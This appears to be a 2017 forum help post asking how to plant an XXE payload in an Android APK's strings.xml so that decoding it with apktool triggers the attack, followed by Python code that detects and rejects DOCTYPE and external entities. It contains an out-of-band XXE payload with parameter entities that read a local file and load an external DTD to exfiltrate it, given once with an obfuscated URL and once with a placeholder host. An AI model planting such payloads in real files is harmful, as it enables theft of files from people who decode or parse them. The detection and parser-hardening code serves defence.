[Help][Discussion] How can DTD DOCTYPE syntax be inserted into an APK's AndroidManifest.xml or res/values/strings.xml?
Posted: 2017-12-22 09:48
XML overview
In XML DTD syntax, if external entities are allowed, a construct such as <!DOCTYPE root[ <!ELEMENT file SYSTEM "file:///etc/passwd"]> may appear. When Java parses that XML, an XXE attack becomes possible (which can lead to arbitrary file reads, file uploads and similar harm).
In an APK, AndroidManifest.xml follows the XML Schema model. When building the APK with Android Studio, DTD syntax is not permitted in it. In strings.xml, however, DTD syntax is allowed, and the build does not report an error.
But when I decode the APK with apktool, I find that the DTD syntax does not appear in the decoded strings.xml. If the DTD were present in the APK's strings.xml, then apktool decode would also be subject to an XXE attack.
My question: is there a way to get the DTD syntax (<!DOCTYPE root[ <!ELEMENT file SYSTEM "file:///etc/passwd"]>) built into the APK's strings.xml?
The origin of this question is this vulnerability: 2d1K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2S2L8Y4q4#2j5h3&6C8k6g2)9J5k6h3y4G2L8g2)9J5c8Y4m8G2M7%4c8Q4x3V1k6A6k6q4)9J5c8U0R3&6x3K6p5$3
But that vulnerability is very limited: it only works by manually editing AndroidManifest.xml so that XXE fires at build time, so the real-world impact is almost zero.
Here is the evil strings.xml I used for testing:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///tmp/xxetest">
<!ENTITY % dtd SYSTEM "27aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4x3W2)9J5k6e0p5^5i4K6u0W2x3q4)9J5k6e0u0Q4x3V1k6W2N6X3W2D9i4K6u0W2k6s2c8V1">
%dtd;
%all;
%send;
]>
<resources>
<string name="abc_action_bar_home_description">Navigate home</string>
<string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
<string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string>
<string name="abc_action_bar_up_description">Navigate up</string>
<string name="abc_action_menu_overflow_description">More options</string>
<string name="abc_action_mode_done">Done</string>
<string name="abc_activity_chooser_view_see_all">See all</string>
<string name="abc_activitychooserview_choose_application">Choose an app</string>
<string name="abc_capital_off">OFF</string>
<string name="abc_capital_on">ON</string>
<string name="abc_search_hint">Search…</string>
<string name="abc_searchview_description_clear">Clear query</string>
<string name="abc_searchview_description_query">Search query</string>
<string name="abc_searchview_description_search">Search</string>
<string name="abc_searchview_description_submit">Submit query</string>
<string name="abc_searchview_description_voice">Voice search</string>
<string name="abc_shareactionprovider_share_with">Share with</string>
<string name="abc_shareactionprovider_share_with_application">Share with %s</string>
<string name="abc_toolbar_collapse_description">Collapse</string>
<string name="search_menu_title">Search</string>
<string name="status_bar_notification_info_overflow">999+</string>
<string name="abc_font_family_body_1_material">sans-serif</string>
<string name="abc_font_family_body_2_material">sans-serif-medium</string>
<string name="abc_font_family_button_material">sans-serif-medium</string>
<string name="abc_font_family_caption_material">sans-serif</string>
<string name="abc_font_family_display_1_material">sans-serif</string>
<string name="abc_font_family_display_2_material">sans-serif</string>
<string name="abc_font_family_display_3_material">sans-serif</string>
<string name="abc_font_family_display_4_material">sans-serif-light</string>
<string name="abc_font_family_headline_material">sans-serif</string>
<string name="abc_font_family_menu_material">sans-serif</string>
<string name="abc_font_family_subhead_material">sans-serif</string>
<string name="abc_font_family_title_material">sans-serif-medium</string>
<string name="app_name">My Application</string>
</resources>
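From the defender's side, the question above comes down to two checks: a lint that flags DTD constructs in resource XML before anything parses it, and a parser policy that refuses a DOCTYPE outright (the same policy the Java XML APIs express with the disallow-doctype-decl feature). The following is an added example, not code from the original post or from apktool; it uses only the Python standard library (expat), and the two sample documents are constructed, with a placeholder host in place of the external DTD URL.

```python
# Added example (not from the original post or apktool): detect DTD/XXE hazards
# in Android resource XML and parse strings.xml with every DOCTYPE rejected.
import re
import xml.parsers.expat

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC ...> : entity content comes from outside the file
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# %name; : parameter-entity reference, the trigger used by the chain in the post
PE_REF_RE = re.compile(r"%([A-Za-z_][\w.\-]*);")


class DoctypeRejected(Exception):
    """Raised when a resource file carries a DOCTYPE declaration."""


def find_dtd_hazards(xml_text):
    """Return (kind, detail) findings for DTD constructs a resource file should never contain."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append(("doctype", "document declares a DOCTYPE"))
    for m in EXTERNAL_ENTITY_RE.finditer(xml_text):
        kind = "external-parameter-entity" if m.group(1) else "external-general-entity"
        findings.append((kind, m.group(2)))
    for m in PE_REF_RE.finditer(xml_text):
        findings.append(("parameter-entity-reference", m.group(1)))
    return findings


def parse_resources_safely(xml_text):
    """Parse a strings.xml into {name: value}; refuse any DOCTYPE and any external entity."""
    strings = {}
    current = {"name": None, "buf": []}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so no entity is ever processed.
        raise DoctypeRejected("DOCTYPE %r is not allowed in resource XML" % name)

    def external_entity_ref(context, base, system_id, public_id):
        return False  # never fetch; expat turns a false return into a parse error

    def start_element(tag, attrs):
        if tag == "string":
            current["name"] = attrs.get("name")
            current["buf"] = []

    def char_data(data):
        if current["name"] is not None:
            current["buf"].append(data)

    def end_element(tag):
        if tag == "string" and current["name"] is not None:
            strings[current["name"]] = "".join(current["buf"])
            current["name"] = None

    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(xml_text, True)
    return strings


def parse_or_reject(xml_text):
    """Return (True, strings) for clean input, (False, reason) when the file is rejected."""
    try:
        return True, parse_resources_safely(xml_text)
    except (DoctypeRejected, xml.parsers.expat.ExpatError) as exc:
        return False, str(exc)


# Constructed sample: the shape of the post's evil strings.xml, with a placeholder host.
EVIL_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///tmp/xxetest">
<!ENTITY % dtd SYSTEM "http://dtd-host.invalid/external.dtd">
%dtd;
%all;
%send;
]>
<resources>
<string name="app_name">My Application</string>
</resources>
"""

# Constructed sample: an ordinary strings.xml with no prolog beyond the XML declaration.
CLEAN_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
<string name="abc_capital_off">OFF</string>
<string name="app_name">My Application</string>
</resources>
"""

if __name__ == "__main__":
    for label, doc in (("evil", EVIL_STRINGS_XML), ("clean", CLEAN_STRINGS_XML)):
        print(label, "hazards:", find_dtd_hazards(doc))
        print(label, "parse:", parse_or_reject(doc))
```

The regex lint is cheap enough to run over every file under res/ in CI and catches the construct the post asks about; the expat policy is the runtime backstop, because raising inside StartDoctypeDeclHandler stops the parser before any entity in the internal subset is declared or expanded, and a false return from ExternalEntityRefHandler guarantees nothing is fetched even if a DOCTYPE slipped through.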